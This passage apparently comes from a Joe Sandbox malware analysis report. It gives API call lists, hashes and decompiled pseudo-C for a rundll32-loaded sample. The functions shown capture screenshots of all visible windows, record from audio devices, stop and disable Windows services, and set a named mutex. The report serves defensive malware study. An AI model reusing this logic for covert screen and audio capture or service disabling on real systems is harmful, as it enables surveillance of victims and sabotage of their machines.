                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 0425E735
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0425E759
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0425E78A
                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 0425E7DD
                                                                                              • RegSetValueExW.ADVAPI32(00000000,0429E124,00000000,00000004,?,00000004), ref: 0425E7FF
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0425E80B
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000010,00000000,00000000,00000000,00000000), ref: 0425E834
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0425E848
                                                                                              Strings
                                                                                              • SOFTWARE\Classes\CLSID\%s, xrefs: 0425E72F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close$EnumOpenValue$CreateQuerywsprintf
                                                                                              • String ID: SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 2517750250-1183003970
                                                                                              • Opcode ID: 58a65479bc3f25071b3d9bfafe8f30be5191d74c5fc682b3c96ead104020f937
                                                                                              • Instruction ID: e8910d93f1dd37a3a54b41cf8a8bc6aafa4388ae79a0a3442d7453a77d6125a8
                                                                                              • Opcode Fuzzy Hash: 58a65479bc3f25071b3d9bfafe8f30be5191d74c5fc682b3c96ead104020f937
                                                                                              • Instruction Fuzzy Hash: DE4164F1754218BBEB209F64EC89FFAB77CEB44704F0001A5AA09E6191EB716E44CE65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E0426A9E0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v612;
                                                                                              				signed int _t11;
                                                                                              				void* _t21;
                                                                                              				long _t26;
                                                                                              				struct _SECURITY_ATTRIBUTES* _t29;
                                                                                              				void* _t39;
                                                                                              				void* _t41;
                                                                                              				void* _t42;
                                                                                              				signed int _t44;
                                                                                              
                                                                                              				_t41 = __esi;
                                                                                              				_t11 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t11 ^ _t44;
                                                                                              				_v612 = 0;
                                                                                              				_t29 = E04269620(__ebx,  &_v612, __edi, __esi, __eflags);
                                                                                              				_v612 = _t29;
                                                                                              				if(_t29 == 0) {
                                                                                              					L11:
                                                                                              					return E04275AFE(_v8 ^ _t44);
                                                                                              				}
                                                                                              				_push(__edi);
                                                                                              				E04266050(_t29, L"rebootshutdown",  &_v88, __edi, __esi);
                                                                                              				wsprintfW( &_v608, L"Global\\%s",  &_v88);
                                                                                              				_t39 = CreateMutexW(0, 1,  &_v608);
                                                                                              				if(_t39 != 0) {
                                                                                              					_t26 = GetLastError();
                                                                                              					_t51 = _t26 - 0xb7;
                                                                                              					if(_t26 == 0xb7) {
                                                                                              						WaitForSingleObject(_t39, 0xffffffff);
                                                                                              					}
                                                                                              				}
                                                                                              				_push(_t41);
                                                                                              				_t42 = 0;
                                                                                              				_t21 = E0426A280(_t29, 0, _t39, 0, _t51);
                                                                                              				_t52 = _t21;
                                                                                              				if(_t21 != 0) {
                                                                                              					L8:
                                                                                              					if(_t39 != 0) {
                                                                                              						ReleaseMutex(_t39);
                                                                                              						CloseHandle(_t39);
                                                                                              					}
                                                                                              					E04275B0F(_t29);
                                                                                              					goto L11;
                                                                                              				} else {
                                                                                              					do {
                                                                                              						_t42 = _t42 + 1;
                                                                                              						Sleep(5);
                                                                                              					} while (E0426A280(Sleep, _t42, _t39, _t42, _t52) == 0);
                                                                                              					_t29 = _v612;
                                                                                              					goto L8;
                                                                                              				}
                                                                                              			}















                                                                                              0x0426a9e0
                                                                                              0x0426a9e9
                                                                                              0x0426a9f0
                                                                                              0x0426a9fa
                                                                                              0x0426aa09
                                                                                              0x0426aa0b
                                                                                              0x0426aa13
                                                                                              0x0426aab4
                                                                                              0x0426aac2
                                                                                              0x0426aac2
                                                                                              0x0426aa19
                                                                                              0x0426aa22
                                                                                              0x0426aa37
                                                                                              0x0426aa51
                                                                                              0x0426aa55
                                                                                              0x0426aa57
                                                                                              0x0426aa5d
                                                                                              0x0426aa62
                                                                                              0x0426aa67
                                                                                              0x0426aa67
                                                                                              0x0426aa62
                                                                                              0x0426aa6d
                                                                                              0x0426aa70
                                                                                              0x0426aa72
                                                                                              0x0426aa77
                                                                                              0x0426aa79
                                                                                              0x0426aa97
                                                                                              0x0426aa9a
                                                                                              0x0426aa9d
                                                                                              0x0426aaa4
                                                                                              0x0426aaa4
                                                                                              0x0426aaab
                                                                                              0x00000000
                                                                                              0x0426aa7b
                                                                                              0x0426aa81
                                                                                              0x0426aa83
                                                                                              0x0426aa84
                                                                                              0x0426aa8d
                                                                                              0x0426aa91
                                                                                              0x00000000
                                                                                              0x0426aa91

                                                                                              APIs
                                                                                                • Part of subcall function 04269620: wsprintfW.USER32 ref: 04269654
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 0426AA37
                                                                                              • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 0426AA4B
                                                                                              • GetLastError.KERNEL32 ref: 0426AA57
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0426AA67
                                                                                              • Sleep.KERNEL32(00000005), ref: 0426AA84
                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0426AA9D
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0426AAA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseMutexwsprintf$CreateErrorHandleLastObjectOpenQueryReleaseSingleSleepValueWait
                                                                                              • String ID: Global\%s$rebootshutdown
                                                                                              • API String ID: 2719347979-2939806910
                                                                                              • Opcode ID: ae436b445a0e6d31973171911f313c6d0e64cd6153f46673a66c3d7d5295624e
                                                                                              • Instruction ID: 0764724cf2d95edba19faa68f24ab1c828d07867bfa82f223d39e631eb1e707b
                                                                                              • Opcode Fuzzy Hash: ae436b445a0e6d31973171911f313c6d0e64cd6153f46673a66c3d7d5295624e
                                                                                              • Instruction Fuzzy Hash: 6E21EE71B143099BD710EBA8FDC8B6EB3B8FF45704F200155E907A6144DF35AD458B55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 042576E3
                                                                                              • CreateCompatibleDC.GDI32 ref: 042576EA
                                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 04257723
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0425772E
                                                                                              • PrintWindow.USER32(00000000,00000000,00000000,?,?,?), ref: 04257745
                                                                                              • PrintWindow.USER32(00000000,00000000,00000002,?,?,?), ref: 0425774B
                                                                                              • PrintWindow.USER32(00000000,00000000,00000000,?,?,?), ref: 04257755
                                                                                              • BitBlt.GDI32(?,?,?,00000000,?,00000000,00000000,00000000,00CC0020), ref: 042577A2
                                                                                              • DeleteObject.GDI32(?), ref: 042577B2
                                                                                              • DeleteDC.GDI32(00000000), ref: 042577B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$Print$CompatibleCreateDeleteObject$BitmapRectSelect
                                                                                              • String ID:
                                                                                              • API String ID: 718922780-0
                                                                                              • Opcode ID: 6a41bcb189d193b1d5ba7911200f156e8ef438544d31e6ecac2d57e2546958fa
                                                                                              • Instruction ID: 935d716a8cbfe9590334829294983709ec174268a92c8575aefa78555919ccf1
                                                                                              • Opcode Fuzzy Hash: 6a41bcb189d193b1d5ba7911200f156e8ef438544d31e6ecac2d57e2546958fa
                                                                                              • Instruction Fuzzy Hash: 65313C71A14609AFDB11DBB8EC58AAEFBBCEF49350F104229F905F3151EB349D81CA60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E04263970(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v32;
                                                                                              				struct _SERVICE_STATUS _v36;
                                                                                              				int _v40;
                                                                                              				signed int _t10;
                                                                                              				void* _t28;
                                                                                              				void* _t36;
                                                                                              				short* _t38;
                                                                                              				void* _t39;
                                                                                              				void* _t40;
                                                                                              				signed int _t41;
                                                                                              
                                                                                              				_t10 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t10 ^ _t41;
                                                                                              				_t38 = __ecx;
                                                                                              				_v40 = 0;
                                                                                              				_t28 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                              				if(_t28 == 0) {
                                                                                              					return E04275AFE(_v8 ^ _t41);
                                                                                              				} else {
                                                                                              					_t36 = OpenServiceW(_t28, _t38, 0xf01ff);
                                                                                              					if(_t36 != 0) {
                                                                                              						_t39 = 0;
                                                                                              						do {
                                                                                              							if(QueryServiceStatus(_t36,  &_v36) == 0) {
                                                                                              								goto L6;
                                                                                              							} else {
                                                                                              								if(_v32 == 1) {
                                                                                              									_t40 = LockServiceDatabase(_t28);
                                                                                              									if(_t40 != 0) {
                                                                                              										_v40 = ChangeServiceConfigW(_t36, 0xffffffff, 4, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
                                                                                              										UnlockServiceDatabase(_t40);
                                                                                              									}
                                                                                              								} else {
                                                                                              									ControlService(_t36, 1,  &_v36);
                                                                                              									Sleep(0x1f4);
                                                                                              									goto L6;
                                                                                              								}
                                                                                              							}
                                                                                              							L10:
                                                                                              							CloseServiceHandle(_t36);
                                                                                              							goto L11;
                                                                                              							L6:
                                                                                              							_t39 = _t39 + 0x1f4;
                                                                                              						} while (_t39 < 0x1388);
                                                                                              						goto L10;
                                                                                              					}
                                                                                              					L11:
                                                                                              					CloseServiceHandle(_t28);
                                                                                              					return E04275AFE(_v8 ^ _t41);
                                                                                              				}
                                                                                              			}














                                                                                              0x04263976
                                                                                              0x0426397d
                                                                                              0x04263985
                                                                                              0x0426398e
                                                                                              0x04263997
                                                                                              0x0426399b
                                                                                              0x04263a59
                                                                                              0x042639a1
                                                                                              0x042639ae
                                                                                              0x042639b2
                                                                                              0x042639b4
                                                                                              0x042639b6
                                                                                              0x042639c3
                                                                                              0x00000000
                                                                                              0x042639c5
                                                                                              0x042639c9
                                                                                              0x042639fa
                                                                                              0x042639fe
                                                                                              0x04263a1c
                                                                                              0x04263a1f
                                                                                              0x04263a1f
                                                                                              0x042639cb
                                                                                              0x042639d2
                                                                                              0x042639dd
                                                                                              0x00000000
                                                                                              0x042639dd
                                                                                              0x042639c9
                                                                                              0x04263a25
                                                                                              0x04263a26
                                                                                              0x00000000
                                                                                              0x042639e3
                                                                                              0x042639e3
                                                                                              0x042639e9
                                                                                              0x00000000
                                                                                              0x042639f1
                                                                                              0x04263a2c
                                                                                              0x04263a2d
                                                                                              0x04263a46
                                                                                              0x04263a46

                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04263991
                                                                                              • OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 042639A8
                                                                                              • QueryServiceStatus.ADVAPI32(00000000,?,?,000F01FF), ref: 042639BB
                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,000F01FF), ref: 042639D2
                                                                                              • Sleep.KERNEL32(000001F4,?,000F01FF), ref: 042639DD
                                                                                              • LockServiceDatabase.ADVAPI32(00000000), ref: 042639F4
                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 04263A15
                                                                                              • UnlockServiceDatabase.ADVAPI32(00000000), ref: 04263A1F
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04263A26
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04263A2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigControlLockManagerQuerySleepStatusUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3671983395-0
                                                                                              • Opcode ID: 98cbb65356549aaf3de07873285db8438b66577f4277f74a37e95410effe93b4
                                                                                              • Instruction ID: db7384a481a27aca25156e0b9363ebaea166f5fed249f459ca1de81319874689
                                                                                              • Opcode Fuzzy Hash: 98cbb65356549aaf3de07873285db8438b66577f4277f74a37e95410effe93b4
                                                                                              • Instruction Fuzzy Hash: 58213D32B052057BC714EBACBC8D9BEB7BCFB85711B100169FD06E3281DE789C418660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E042575B0(void* __ecx) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t18;
                                                                                              				struct HWND__* _t20;
                                                                                              				int _t29;
                                                                                              				void* _t36;
                                                                                              				intOrPtr* _t44;
                                                                                              				struct HWND__* _t47;
                                                                                              				signed int _t48;
                                                                                              				void* _t50;
                                                                                              				void* _t55;
                                                                                              
                                                                                              				_t50 = (_t48 & 0xffffffc0) - 0x34;
                                                                                              				_t36 = __ecx;
                                                                                              				_t18 = CreateCompatibleBitmap( *(__ecx + 0x14),  *(__ecx + 0x3c),  *(__ecx + 0x40));
                                                                                              				 *(__ecx + 0x1c) = _t18;
                                                                                              				SelectObject( *(__ecx + 0x18), _t18);
                                                                                              				_t20 = GetTopWindow(0);
                                                                                              				if(_t20 == 0) {
                                                                                              					L12:
                                                                                              					GetDIBits( *(_t36 + 0x18),  *(_t36 + 0x1c), 0,  *(_t36 + 0x40),  *(_t36 + 0x10), _t36 + 0x38, 0);
                                                                                              					DeleteObject( *(_t36 + 0x1c));
                                                                                              					return  *(_t36 + 0x10);
                                                                                              				}
                                                                                              				_t47 = GetWindow(_t20, 1);
                                                                                              				if(_t47 == 0) {
                                                                                              					goto L12;
                                                                                              				}
                                                                                              				_t44 = _t36 + 0x20;
                                                                                              				do {
                                                                                              					if(IsWindowVisible(_t47) != 0) {
                                                                                              						_t55 =  *((intOrPtr*)(_t44 + 0x10)) - 6;
                                                                                              						if(_t55 > 0 || _t55 == 0 &&  *((intOrPtr*)(_t44 + 0x14)) >= 3) {
                                                                                              							_t29 = 1;
                                                                                              						} else {
                                                                                              							_t29 = 0;
                                                                                              						}
                                                                                              						asm("movsd xmm0, [edi+0x8]");
                                                                                              						asm("movsd [esp], xmm0");
                                                                                              						E042576B0(_t36, _t47,  *_t44, _t44, _t47,  *((intOrPtr*)(_t44 + 4)), _t29);
                                                                                              						_t50 = _t50 - 8 + 0x10;
                                                                                              						SetWindowLongA(_t47, 0xffffffec, GetWindowLongA(_t47, 0xffffffec) | 0x02000000);
                                                                                              						if( *((intOrPtr*)(_t44 + 0x10)) < 6) {
                                                                                              							E042577E0(_t47, _t44);
                                                                                              							_t50 = _t50 + 4;
                                                                                              						}
                                                                                              					}
                                                                                              					_t47 = GetWindow(_t47, 3);
                                                                                              				} while (_t47 != 0);
                                                                                              				goto L12;
                                                                                              			}















                                                                                              0x042575b6
                                                                                              0x042575bb
                                                                                              0x042575c7
                                                                                              0x042575d1
                                                                                              0x042575d4
                                                                                              0x042575dc
                                                                                              0x042575e4
                                                                                              0x04257679
                                                                                              0x0425768d
                                                                                              0x04257696
                                                                                              0x042576a5
                                                                                              0x042576a5
                                                                                              0x042575f3
                                                                                              0x042575f7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042575fd
                                                                                              0x04257600
                                                                                              0x04257609
                                                                                              0x0425760e
                                                                                              0x04257611
                                                                                              0x0425761f
                                                                                              0x0425761b
                                                                                              0x0425761b
                                                                                              0x0425761b
                                                                                              0x04257624
                                                                                              0x04257630
                                                                                              0x04257639
                                                                                              0x0425763e
                                                                                              0x04257653
                                                                                              0x0425765d
                                                                                              0x04257662
                                                                                              0x04257667
                                                                                              0x04257667
                                                                                              0x0425765d
                                                                                              0x04257673
                                                                                              0x04257675
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 042575C7
                                                                                              • SelectObject.GDI32(?,00000000), ref: 042575D4
                                                                                              • GetTopWindow.USER32(00000000), ref: 042575DC
                                                                                              • GetWindow.USER32(00000000,00000001), ref: 042575ED
                                                                                              • IsWindowVisible.USER32(00000000), ref: 04257601
                                                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 04257644
                                                                                              • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04257653
                                                                                              • GetWindow.USER32(00000000,00000003), ref: 0425766D
                                                                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0425768D
                                                                                              • DeleteObject.GDI32(?), ref: 04257696
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$LongObject$BitmapBitsCompatibleCreateDeleteSelectVisible
                                                                                              • String ID:
                                                                                              • API String ID: 358708372-0
                                                                                              • Opcode ID: 1eb144ebb0fa39113889bf5ac90f9389554fb40881f63e55dafc892af41d7b43
                                                                                              • Instruction ID: 3915e3ad2a1b88843fb2c39fc288237eb1efa759be4b47b5ce9a5040f6e025be
                                                                                              • Opcode Fuzzy Hash: 1eb144ebb0fa39113889bf5ac90f9389554fb40881f63e55dafc892af41d7b43
                                                                                              • Instruction Fuzzy Hash: EA21DB31704201ABDB157F68EC4CA6A3B69FF44306F000654FD019A1A2EB35ED22CBE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E04288810(char _a4) {
                                                                                              				char _v8;
                                                                                              
                                                                                              				_t26 = _a4;
                                                                                              				_t52 =  *_a4;
                                                                                              				if( *_a4 != 0x4298988) {
                                                                                              					E042884AD(_t52);
                                                                                              					_t26 = _a4;
                                                                                              				}
                                                                                              				E042884AD( *((intOrPtr*)(_t26 + 0x3c)));
                                                                                              				E042884AD( *((intOrPtr*)(_a4 + 0x30)));
                                                                                              				E042884AD( *((intOrPtr*)(_a4 + 0x34)));
                                                                                              				E042884AD( *((intOrPtr*)(_a4 + 0x38)));
                                                                                              				E042884AD( *((intOrPtr*)(_a4 + 0x28)));
                                                                                              				E042884AD( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                              				E042884AD( *((intOrPtr*)(_a4 + 0x40)));
                                                                                              				E042884AD( *((intOrPtr*)(_a4 + 0x44)));
                                                                                              				E042884AD( *((intOrPtr*)(_a4 + 0x360)));
                                                                                              				_v8 =  &_a4;
                                                                                              				E042886D6(5,  &_v8);
                                                                                              				_v8 =  &_a4;
                                                                                              				return E04288726(4,  &_v8);
                                                                                              			}




                                                                                              0x04288816
                                                                                              0x04288819
                                                                                              0x04288821
                                                                                              0x04288824
                                                                                              0x04288829
                                                                                              0x0428882c
                                                                                              0x04288830
                                                                                              0x0428883b
                                                                                              0x04288846
                                                                                              0x04288851
                                                                                              0x0428885c
                                                                                              0x04288867
                                                                                              0x04288872
                                                                                              0x0428887d
                                                                                              0x0428888b
                                                                                              0x04288893
                                                                                              0x0428889c
                                                                                              0x042888a4
                                                                                              0x042888b8

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 04288824
                                                                                                • Part of subcall function 042884AD: HeapFree.KERNEL32(00000000,00000000,?,042812C5,00000001,00000001), ref: 042884C3
                                                                                                • Part of subcall function 042884AD: GetLastError.KERNEL32(D33DB39D,?,042812C5,00000001,00000001), ref: 042884D5
                                                                                              • _free.LIBCMT ref: 04288830
                                                                                              • _free.LIBCMT ref: 0428883B
                                                                                              • _free.LIBCMT ref: 04288846
                                                                                              • _free.LIBCMT ref: 04288851
                                                                                              • _free.LIBCMT ref: 0428885C
                                                                                              • _free.LIBCMT ref: 04288867
                                                                                              • _free.LIBCMT ref: 04288872
                                                                                              • _free.LIBCMT ref: 0428887D
                                                                                              • _free.LIBCMT ref: 0428888B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 2bb47d964617ada639e843f209aad5e487a15db4a3514a0742dd7d93ff703240
                                                                                              • Instruction ID: ee84fcbdb58e7741c60f9c8b0904fb988acef69fe99b005fe0abc24453e38b72
                                                                                              • Opcode Fuzzy Hash: 2bb47d964617ada639e843f209aad5e487a15db4a3514a0742dd7d93ff703240
                                                                                              • Instruction Fuzzy Hash: B911B976221108BFEB01FF55DC40DDD3BB9EF44264B8140A9F9184F2A2D632FE60AB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04252027
                                                                                              • waveInGetNumDevs.WINMM ref: 04252032
                                                                                                • Part of subcall function 04251190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74D0F5E0,?,0425205E), ref: 042511A9
                                                                                                • Part of subcall function 04251190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74D0F5E0,?,0425205E), ref: 042511B6
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,0000003F), ref: 04252082
                                                                                              • Sleep.KERNEL32(00000096), ref: 0425208D
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 042520A9
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 042520CE
                                                                                              • CloseHandle.KERNEL32(?), ref: 042520D7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateEvent$ObjectSingleWait$CloseDevsHandleSleepwave
                                                                                              • String ID: |
                                                                                              • API String ID: 1906678132-2343686810
                                                                                              • Opcode ID: cb9233a4f417b8e2566a3c2cbc4d0c01b181869c699a875de858a2f0d9396d82
                                                                                              • Instruction ID: 02d96cbf96d724645cad5b1173b28b7e748ad11d506c15e5ac0363f6a4432691
                                                                                              • Opcode Fuzzy Hash: cb9233a4f417b8e2566a3c2cbc4d0c01b181869c699a875de858a2f0d9396d82
                                                                                              • Instruction Fuzzy Hash: 3E310970F54304BFEB10AFA8EC45F6A7BA4EF04710F244159F904AE2C1C6B5AE40CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 55%
                                                                                              			E0425AFB0(intOrPtr* __ecx, signed int _a4, char _a5) {
                                                                                              				intOrPtr* _v8;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t33;
                                                                                              				void* _t34;
                                                                                              				signed int* _t35;
                                                                                              				signed int* _t41;
                                                                                              				signed int _t43;
                                                                                              				signed int* _t44;
                                                                                              				signed char _t47;
                                                                                              				signed int* _t57;
                                                                                              				intOrPtr* _t63;
                                                                                              				void* _t65;
                                                                                              				intOrPtr* _t67;
                                                                                              				signed char _t71;
                                                                                              				signed char _t72;
                                                                                              				signed int _t74;
                                                                                              				intOrPtr* _t75;
                                                                                              				signed int* _t80;
                                                                                              				void* _t83;
                                                                                              				void* _t85;
                                                                                              				void* _t88;
                                                                                              				intOrPtr _t89;
                                                                                              				signed int _t91;
                                                                                              				void* _t94;
                                                                                              				void* _t101;
                                                                                              
                                                                                              				_t67 = __ecx;
                                                                                              				_push(__ecx);
                                                                                              				_t33 = _a4;
                                                                                              				_push(_t88);
                                                                                              				_t63 = __ecx;
                                                                                              				 *__ecx = 0x429e8b0;
                                                                                              				 *((intOrPtr*)(__ecx + 4)) = _t33;
                                                                                              				_v8 = __ecx;
                                                                                              				 *((intOrPtr*)(_t33 + 0x38)) = __ecx;
                                                                                              				_t34 = CreateEventW(0, 1, 0, 0);
                                                                                              				_t83 = Sleep;
                                                                                              				 *(_t63 + 8) = _t34;
                                                                                              				_t35 =  *0x42a7adc; // 0x0
                                                                                              				 *_t63 = 0x429e8a0;
                                                                                              				if(_t35 != 0) {
                                                                                              					L5:
                                                                                              					_push(_t67);
                                                                                              					_t7 = _t63 + 4; // 0x0
                                                                                              					_push(0x3f);
                                                                                              					_a5 = _t35[0x83];
                                                                                              					_push(2);
                                                                                              					_push( &_a4);
                                                                                              					_a4 = 0x7e;
                                                                                              					E04251C60( *_t7);
                                                                                              					_t11 = _t63 + 8; // 0x0
                                                                                              					WaitForSingleObject( *_t11, 0xffffffff);
                                                                                              					Sleep(0x96);
                                                                                              					E0425B6D0(_t63, _t63, _t83, _t88, _t98);
                                                                                              					_t41 =  *0x42a7adc; // 0x0
                                                                                              					_a4 =  *_t41;
                                                                                              					while(1) {
                                                                                              						_t13 = _t63 + 4; // 0x0
                                                                                              						_t89 =  *_t13;
                                                                                              						_t43 =  *(_t89 + 0x5c) & 0x0000ffff;
                                                                                              						if(_t43 != 1) {
                                                                                              							goto L10;
                                                                                              						}
                                                                                              						_t75 =  *((intOrPtr*)(_t89 + 0x20));
                                                                                              						if(_t75 == 0) {
                                                                                              							goto L10;
                                                                                              						} else {
                                                                                              							_t101 =  *((intOrPtr*)( *_t75 + 0x40))();
                                                                                              							L14:
                                                                                              							if(_t101 != 0) {
                                                                                              								_t80 =  *0x42a7adc; // 0x0
                                                                                              								_t91 = _a4;
                                                                                              								_t74 =  *_t80;
                                                                                              								if(_t74 != _t91) {
                                                                                              									_t50 =  <  ? _t74 : _t74 - _t91;
                                                                                              									_t85 = ( <  ? _t74 : _t74 - _t91) + ( <  ? _t74 : _t74 - _t91);
                                                                                              									_t23 = _t85 + 1; // 0x74cb6491
                                                                                              									_t65 = LocalAlloc(0x40, _t23);
                                                                                              									_t26 = _t65 + 1; // 0x1
                                                                                              									 *_t65 = 0x7f;
                                                                                              									E0427E060(_t26,  &(_t80[0x105]) + _t91 * 2, _t85);
                                                                                              									_t28 = _t85 + 1; // 0x74cb6491
                                                                                              									_t94 = _t94 + 8;
                                                                                              									_push(0x3f);
                                                                                              									_push(_t65);
                                                                                              									E04251C60( *((intOrPtr*)(_v8 + 4)));
                                                                                              									LocalFree(_t65);
                                                                                              									_t57 =  *0x42a7adc; // 0x0
                                                                                              									_t63 = _v8;
                                                                                              									_a4 =  *_t57;
                                                                                              								}
                                                                                              								Sleep(0x12c);
                                                                                              								continue;
                                                                                              							}
                                                                                              						}
                                                                                              						L18:
